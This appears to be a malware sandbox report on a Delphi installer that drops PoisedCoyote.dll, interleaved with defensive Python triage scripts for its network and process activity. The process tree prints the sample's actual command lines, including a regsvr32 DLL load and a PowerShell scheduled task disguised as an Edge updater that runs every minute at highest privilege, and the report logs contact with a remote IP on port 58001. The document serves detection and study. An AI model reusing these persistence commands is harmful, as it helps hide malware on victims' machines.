Timestamp | Bytes transferred | Direction | Data
2024-11-21 01:58:57 UTC | 98 | OUT | GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
Host: the.earth.li
Connection: Keep-Alive
2024-11-21 01:58:57 UTC | 227 | IN | HTTP/1.1 302 Found
Date: Thu, 21 Nov 2024 01:58:57 GMT
Server: Apache
Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-11-21 01:58:57 UTC | 302 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 38 31 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49746 | 93.93.131.124 | 443 | 7688 | C:\Windows\System32\regsvr32.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 01:59:01 UTC | 98 | OUT | GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
Host: the.earth.li
Connection: Keep-Alive
2024-11-21 01:59:01 UTC | 227 | IN | HTTP/1.1 302 Found
Date: Thu, 21 Nov 2024 01:59:01 GMT
Server: Apache
Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-11-21 01:59:01 UTC | 302 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 38 31 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


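The two HTTP sessions above are initiated by regsvr32.exe, a Windows system binary that has no reason to originate web requests itself, the GET carries no User-Agent header, the resource fetched is an .exe, and the packet tables also show a TCP exchange with 154.216.19.129 on port 58001. The Python below is an added triage example and is not part of the Joe Sandbox report or the sample; the packet rows and the HTTP session are constructed copies of the report's tables, and the expected-port and system-binary lists are illustrative assumptions to be tuned per environment.

```python
"""Network-side triage of the traffic tables above (constructed records)."""
from ipaddress import ip_address

# Constructed to mirror the packet rows and HTTP session in the report; not a live capture.
PACKET_ROWS = [
    # (timestamp, src_port, dst_port, src_ip, dst_ip)
    ("Nov 21, 2024 02:58:55.280458927 CET", 64351, 53, "192.168.2.4", "1.1.1.1"),
    ("Nov 21, 2024 02:58:55.649744987 CET", 53, 64351, "1.1.1.1", "192.168.2.4"),
    ("Nov 21, 2024 03:00:09.137139082 CET", 58001, 49945, "154.216.19.129", "192.168.2.4"),
    ("Nov 21, 2024 03:00:09.137212038 CET", 49945, 58001, "192.168.2.4", "154.216.19.129"),
]
HTTP_SESSION = {
    "process": r"C:\Windows\System32\regsvr32.exe", "pid": 7688,
    "server": ("93.93.131.124", 443),
    "request": ("GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1\r\n"
                "Host: the.earth.li\r\nConnection: Keep-Alive\r\n\r\n"),
    "response": ("HTTP/1.1 302 Found\r\nServer: Apache\r\n"
                 "Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe\r\n"
                 "Content-Length: 302\r\nConnection: close\r\n\r\n"),
}

# Illustrative baselines (assumptions); tune per environment.
EXPECTED_PORTS = {53, 80, 443}
# Windows binaries that should not normally originate HTTP on their own.
SYSTEM_BINARIES = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe", "msiexec.exe"}


def parse_http(raw):
    """Split a raw HTTP message into its start line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return lines[0], headers


def orient(row):
    """Treat the RFC1918 side as the client so request and reply rows
    collapse onto the same (server_ip, server_port) tuple."""
    _ts, sport, dport, sip, dip = row
    if ip_address(sip).is_private and not ip_address(dip).is_private:
        return sip, sport, dip, dport
    return dip, dport, sip, sport


def servers(rows):
    """Distinct remote endpoints the sandbox host talked to."""
    return sorted({(s_ip, s_port) for _c, _cp, s_ip, s_port in map(orient, rows)})


def flow_findings(rows):
    """Flag public endpoints reached on a port outside the expected baseline."""
    out = []
    for s_ip, s_port in servers(rows):
        if ip_address(s_ip).is_global and s_port not in EXPECTED_PORTS:
            out.append(f"nonstandard_port:{s_ip}:{s_port}")
    return out


def http_findings(session):
    """Apply the checks the report's own signatures hint at to one HTTP session."""
    start, req = parse_http(session["request"])
    status, resp = parse_http(session["response"])
    out = []
    if "user-agent" not in req:
        out.append("no_user_agent")
    if session["process"].rsplit("\\", 1)[-1].lower() in SYSTEM_BINARIES:
        out.append("system_binary_initiator")
    path = start.split(" ")[1]
    if path.lower().endswith((".exe", ".dll", ".msi")):
        out.append("executable_download")
    if status.split(" ")[1].startswith("3") and "location" in resp:
        out.append("redirect:" + resp["location"])
    return out


if __name__ == "__main__":
    print(flow_findings(PACKET_ROWS))
    print(http_findings(HTTP_SESSION))
```

The orientation step matters when working from packet rows rather than flow records: half of the rows above have 154.216.19.129:58001 as the source, and without folding replies onto the client side the same endpoint would be counted twice and the ephemeral port 49945 could be mistaken for the service port.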
                                                                  Target ID:0
                                                                  Start time:20:58:03
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'769'630 bytes
                                                                  MD5 hash:FECD099F9B8D9500D7199A1054397E3F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:20:58:03
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'160'704 bytes
                                                                  MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 2%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /T 3
                                                                  Imagebase:0x6d0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x400000
                                                                  File size:1'769'630 bytes
                                                                  MD5 hash:FECD099F9B8D9500D7199A1054397E3F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x400000
                                                                  File size:1'160'704 bytes
                                                                  MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 2%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
                                                                  Imagebase:0x3c0000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
                                                                  Imagebase:0x7ff7fe480000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:9
                                                                  Start time:20:58:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:20:58:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:20:58:22
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:20:58:22
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:20:58:25
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
                                                                  Imagebase:0x7ff7fe480000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:20:58:32
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:20:58:32
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

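The process list above records the persistence chain: regsvr32.exe /s /i:INSTALL loads PoisedCoyote.dll out of the user's %AppData% (the /i switch hands its argument to the DLL's DllInstall export), a PowerShell one-liner checks whether a scheduled task already runs that command, and Register-ScheduledTask then creates a task named after Microsoft Edge Update that re-runs the same regsvr32 command every minute at RunLevel Highest. The Python below is an added detection example, not code from the report or from the sample; the process records are constructed from the command lines above (plus one benign regsvr32 invocation as a control), and the LOLBIN, vendor-prefix and user-writable-path lists are illustrative assumptions.

```python
"""Host-side triage of the process tree above (constructed records)."""
import re

# Constructed from the command lines in the report (Target IDs 2, 7, 9, 14, 16),
# plus one benign regsvr32 invocation (pid 99) as a control. Not live telemetry.
RECORDS = [
    {"pid": 2, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES'},
    {"pid": 7, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r'"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"'},
    {"pid": 9, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"'''},
    {"pid": 14, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"'''},
    {"pid": 16, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll"},
    {"pid": 99, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s /i "C:\Program Files\Vendor\thing.dll"'},
]

# Illustrative lists (assumptions); tune to the environment.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
VENDOR_UPDATE_NAME = re.compile(r"^(Microsoft|Google|Adobe|Mozilla)\w*Update", re.IGNORECASE)
# Directories a non-admin user can write to; a DLL loaded from here is not a vendor install.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE)


def exe_name(token):
    """Normalise an image path or bare command token to 'name.exe'."""
    name = token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name if "." in name else name + ".exe"


def regsvr32_dllinstall_user_path(rec):
    """regsvr32 /i[:arg] calls the DLL's DllInstall export; flag it when the DLL
    sits in a user-writable directory (Targets 7 and 16 above)."""
    if exe_name(rec["image"]) != "regsvr32.exe":
        return None
    m = re.search(r'/i(?::\S*)?\s+"?([^"]+?\.dll)"?', rec["cmd"], re.IGNORECASE)
    return m.group(1) if m and USER_WRITABLE.search(m.group(1)) else None


def scheduled_task_lolbin_persistence(rec):
    """Pick apart a Register-ScheduledTask command line (Target 14 above)."""
    cmd = rec["cmd"]
    if "Register-ScheduledTask" not in cmd:
        return None
    execute = re.search(r'''-Execute\s+\\?["']?([^\s"'\\]+)''', cmd, re.IGNORECASE)
    args = re.search(r'''-Argument\s+\\?["']?([^"']+?)\\?["']''', cmd, re.IGNORECASE)
    name = re.search(r'''-TaskName\s+["']?([^"'\s]+)''', cmd, re.IGNORECASE)
    rep = re.search(r"-RepetitionInterval\s+\(New-TimeSpan\s+-Minutes\s+(\d+)\)", cmd, re.IGNORECASE)
    if not execute:
        return None
    exe = exe_name(execute.group(1))
    reasons = []
    if exe in LOLBINS:
        reasons.append(f"action runs {exe}")
    if args and USER_WRITABLE.search(args.group(1)):
        reasons.append("action argument points into a user-writable path")
    if name and exe in LOLBINS and VENDOR_UPDATE_NAME.match(name.group(1)):
        reasons.append("task name imitates a vendor updater")
    if re.search(r"-RunLevel\s+Highest", cmd, re.IGNORECASE):
        reasons.append("RunLevel Highest")
    if rep:
        reasons.append(f"repeats every {rep.group(1)} min")
    if not reasons:
        return None
    return {"task": name.group(1) if name else None, "execute": exe, "reasons": reasons}


def cmd_delayed_relaunch(rec):
    """cmd /C timeout N & <exe>: a deferred re-launch of a binary from a user path (Target 2)."""
    if exe_name(rec["image"]) != "cmd.exe":
        return None
    m = re.search(r'timeout\s+/t\s+(\d+)\s*&\s*"?([^"&]+?\.exe)"?', rec["cmd"], re.IGNORECASE)
    if m and USER_WRITABLE.search(m.group(2)):
        return {"delay_s": int(m.group(1)), "target": m.group(2)}
    return None


def triage(records):
    """Run every rule over every record; return (pid, rule name, detail) tuples."""
    rules = (regsvr32_dllinstall_user_path, scheduled_task_lolbin_persistence, cmd_delayed_relaunch)
    findings = []
    for rec in records:
        for rule in rules:
            detail = rule(rec)
            if detail:
                findings.append((rec["pid"], rule.__name__, detail))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(RECORDS):
        print(pid, rule, detail)
```

On a live host the hunting predicate is the one the sample itself runs in Target 9, turned around: enumerate Get-ScheduledTask results whose action Execute is regsvr32 (or another LOLBIN) and whose Arguments point under \AppData\, and compare each task's name with the binary it actually launches rather than trusting a vendor-looking name and GUID.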
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eccacc5ecdeee567d6612bdc617b986b20d245bcbc723a486c47b9d5daaf4d6f
                                                                    • Instruction ID: 1813a7421218b03dd42d01eefd279a7de6fadf71a9b8f33d566e1a26b6afe848
                                                                    • Opcode Fuzzy Hash: eccacc5ecdeee567d6612bdc617b986b20d245bcbc723a486c47b9d5daaf4d6f

                                                                    Execution Graph

                                                                    Execution Coverage: 5.1%
                                                                    Dynamic/Decrypted Code Coverage: 0.2%
                                                                    Signature Coverage: 10.7%
                                                                    Total number of Nodes: 1120
                                                                    Total number of Limit Nodes: 17
7ffdfb20a8e0 HeapFree 35869->35870 35870->35869 35910 7ffdfb25abd0 35871->35910 35873 7ffdfb25cf3b 35874 7ffdfb25cf40 35873->35874 35877 7ffdfb25cf64 35873->35877 35875 7ffdfb25cf48 35874->35875 35950 7ffdfb258a20 35874->35950 35875->35858 35891 7ffdfb25cfa3 35877->35891 35969 7ffdfb28e560 35877->35969 35880 7ffdfb25d084 35881 7ffdfb25d029 35880->35881 35883 7ffdfb20a8e0 HeapFree 35880->35883 35882 7ffdfb28e560 77 API calls 35881->35882 35887 7ffdfb25d02e 35881->35887 35885 7ffdfb25d0b9 35882->35885 35883->35881 35884 7ffdfb25cfe0 35884->35881 35888 7ffdfb20a8e0 HeapFree 35884->35888 35886 7ffdfb25d117 35885->35886 35890 7ffdfb25d0c3 35885->35890 35886->35887 35889 7ffdfb20a8e0 HeapFree 35886->35889 35887->35891 35893 7ffdfb25d189 35887->35893 35894 7ffdfb20a8e0 HeapFree 35887->35894 35888->35881 35889->35887 35890->35887 35892 7ffdfb20a8e0 HeapFree 35890->35892 35891->35858 35892->35887 35895 7ffdfb20a8e0 HeapFree 35893->35895 35894->35893 35895->35891 35897 7ffdfb228c74 35896->35897 35898 7ffdfb228c28 35896->35898 35900 7ffdfb228c7d 35897->35900 35901 7ffdfb228d7e 35897->35901 36078 7ffdfb20bc70 35898->36078 35903 7ffdfb25cf30 99 API calls 35900->35903 35901->35898 35904 7ffdfb228c88 35901->35904 35903->35904 35908 7ffdfb228d1c 35904->35908 36085 7ffdfb230a90 35904->36085 35906 7ffdfb211658 35906->35861 35906->35862 35908->35906 36102 7ffdfb227b90 HeapFree 35908->36102 35911 7ffdfb25cac0 35910->35911 35912 7ffdfb25cad5 TlsGetValue 35911->35912 35913 7ffdfb25cae4 35911->35913 35912->35913 35919 7ffdfb25cb00 35912->35919 35914 7ffdfb20a8d0 HeapAlloc 35913->35914 35913->35919 35915 7ffdfb25cb1f 35914->35915 35916 7ffdfb25cb81 35915->35916 35917 7ffdfb25cb24 TlsGetValue TlsSetValue 35915->35917 35920 7ffdfb2dead0 72 API calls 35916->35920 35918 7ffdfb25cb49 35917->35918 35917->35919 35921 7ffdfb20a8e0 HeapFree 35918->35921 35919->35873 35922 7ffdfb25cb90 35920->35922 35921->35919 35923 7ffdfb25cc83 35922->35923 35924 7ffdfb25cbb5 TlsGetValue 35922->35924 35927 
7ffdfb25cc88 TlsGetValue 35923->35927 35925 7ffdfb25cc74 35924->35925 35926 7ffdfb25cbc8 35924->35926 35925->35873 35926->35925 35928 7ffdfb25cbf0 35926->35928 35972 7ffdfb263090 35926->35972 35927->35925 35927->35926 35931 7ffdfb20a8d0 HeapAlloc 35928->35931 35930 7ffdfb25cbe8 35977 7ffdfb262e00 35930->35977 35933 7ffdfb25cc0c 35931->35933 35934 7ffdfb25cc9d 35933->35934 35935 7ffdfb25cc15 TlsGetValue TlsSetValue 35933->35935 35936 7ffdfb2dead0 72 API calls 35934->35936 35935->35925 35937 7ffdfb25cc3a 35935->35937 35938 7ffdfb25ccac 35936->35938 35939 7ffdfb25cc61 35937->35939 35991 7ffdfb264290 85 API calls 35937->35991 35941 7ffdfb20a8e0 HeapFree 35938->35941 35940 7ffdfb20a8e0 HeapFree 35939->35940 35940->35925 35943 7ffdfb25ccc4 35941->35943 35944 7ffdfb302850 6 API calls 35943->35944 35945 7ffdfb25cccc 35944->35945 35946 7ffdfb25ccf6 35945->35946 35992 7ffdfb264290 85 API calls 35945->35992 35948 7ffdfb302850 6 API calls 35946->35948 35949 7ffdfb25ccfe 35948->35949 35951 7ffdfb258a39 35950->35951 35953 7ffdfb258a73 35950->35953 35995 7ffdfb2b98d0 35951->35995 35954 7ffdfb258aa1 35953->35954 35955 7ffdfb258aae 35953->35955 35956 7ffdfb258a8d 35953->35956 35954->35875 36001 7ffdfb2578c0 HeapFree 35955->36001 36000 7ffdfb2578c0 HeapFree 35956->36000 35959 7ffdfb258af0 35960 7ffdfb302850 6 API calls 35959->35960 35961 7ffdfb258b13 35960->35961 35962 7ffdfb258b96 35961->35962 35963 7ffdfb258b87 35961->35963 35965 7ffdfb2b98d0 2 API calls 35962->35965 36002 7ffdfb257730 HeapFree 35963->36002 35967 7ffdfb258c2d 35965->35967 35966 7ffdfb258b91 35966->35875 35967->35966 36003 7ffdfb257730 HeapFree 35967->36003 36004 7ffdfb28e6a0 35969->36004 35971 7ffdfb25cfd2 35971->35880 35971->35884 35973 7ffdfb26309f 35972->35973 35974 7ffdfb2630ab 35972->35974 35973->35930 35993 7ffdfb264650 WaitOnAddress GetLastError 35974->35993 35976 7ffdfb2630b7 35976->35930 35978 7ffdfb263dc0 35977->35978 35979 7ffdfb263f0b 35978->35979 35981 7ffdfb263e3a memcpy 35978->35981 35994 
